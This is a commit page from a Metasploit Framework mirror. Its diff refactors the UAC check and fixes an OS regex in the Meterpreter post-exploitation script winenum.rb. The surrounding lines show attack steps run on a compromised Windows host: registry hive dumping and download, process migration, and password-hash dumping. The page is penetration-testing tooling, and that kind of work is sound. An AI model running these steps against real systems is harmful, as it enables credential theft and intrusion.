infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Ticket #2427 Fixed regex in main part of the code and changed the UAC check to the one in the Meterpreter Mixin 

git-svn-id: file:///home/svn/framework3/trunk@10079 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Carlos Perez 2010-08-20 13:07:41 +00:00
parent 0e1ed07e73
commit b7ec92ae1f
1 changed files with 8 additions and 20 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

28
scripts/meterpreter/winenum.rb
View File

@ -424,7 +424,6 @@ def regdump(pathoflogs,filename)
host,port = @client.tunnel_peer.split(':') host,port = @client.tunnel_peer.split(':')
#This variable will only contain garbage, it is to make sure that the channel is not closed while the reg is being dumped and compress #This variable will only contain garbage, it is to make sure that the channel is not closed while the reg is being dumped and compress
garbage = '' garbage = ''
windrtmp = ''
hives = %w{HKCU HKLM HKCC HKCR HKU} hives = %w{HKCU HKLM HKCC HKCR HKU}
windir = @client.fs.file.expand_path("%WinDir%") windir = @client.fs.file.expand_path("%WinDir%")
print_status('Dumping and Downloading the Registry') print_status('Dumping and Downloading the Registry')
@ -542,23 +541,12 @@ def migrate()
end end
#--------------------------------------------------------------------------------------------------------- #---------------------------------------------------------------------------------------------------------
#Function for Checking for UAC #Function for Checking for UAC
def uaccheck(winversion) def uaccheck()
uac = false uac = is_uac_enabled?
if winversion['OS']=~ /^Windows (Vista|7)/ if uac
if @client.sys.config.getuid != "NT AUTHORITY\\SYSTEM" print_status("\tUAC is Enabled")
print_status("Checking if UAC is enabled ...") else
key = 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System' print_status("\tUAC is Disabled")
root_key, base_key = @client.sys.registry.splitkey(key)
value = "EnableLUA"
open_key = @client.sys.registry.open_key(root_key, base_key, KEY_READ)
v = open_key.query_value(value)
if v.data == 1
print_status("\tUAC is Enabled")
uac = true
else
print_status("\tUAC is Disabled")
end
end
end end
file_local_write(@dest,"UAC is Enabled") file_local_write(@dest,"UAC is Enabled")
return uac return uac
@ -586,7 +574,7 @@ print_status("Output of each individual command is saved to #{@logfol}")
file_local_write(@dest,header) file_local_write(@dest,header)
file_local_write(@dest,chkvm()) file_local_write(@dest,chkvm())
trgtos = info['OS'] trgtos = info['OS']
uac = uaccheck(info) uac = uaccheck()
# Run Commands according to OS some commands are not available on all versions of Windows # Run Commands according to OS some commands are not available on all versions of Windows
if trgtos =~ /(Windows XP)/ if trgtos =~ /(Windows XP)/
if trgtos =~ /(2600, \)|2600, Service Pack 1\))/ if trgtos =~ /(2600, \)|2600, Service Pack 1\))/
@ -611,7 +599,7 @@ elsif trgtos =~ /(Windows 2008)/
else else
gethash() gethash()
end end
elsif trgtos =~ /(Vista|7)/ elsif trgtos =~ /(Windows Vista|7)/
list_exec(commands + vstwlancmd) list_exec(commands + vstwlancmd)
wmicexec(wmic) wmicexec(wmic)
findprogs() findprogs()